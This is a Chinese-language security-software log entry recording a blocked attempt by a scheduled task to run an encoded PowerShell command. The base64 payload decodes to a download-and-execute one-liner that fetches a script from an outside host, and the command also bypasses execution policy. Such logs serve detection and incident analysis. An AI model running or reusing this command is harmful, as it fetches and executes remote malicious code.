【1】2020-04-21 00:27:07,系统防护,系统加固,svchost.exe触犯敏感动作防护规则, 已阻止
操作进程:C:\WINDOWS\system32\svchost.exe
命令行:C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s Schedule
父进程:C:\WINDOWS\system32\services.exe
防护项目:利用PowerShell执行可疑脚本
执行文件:C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwAC4AYwBvAG0AJwApACkA
操作结果:已阻止
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|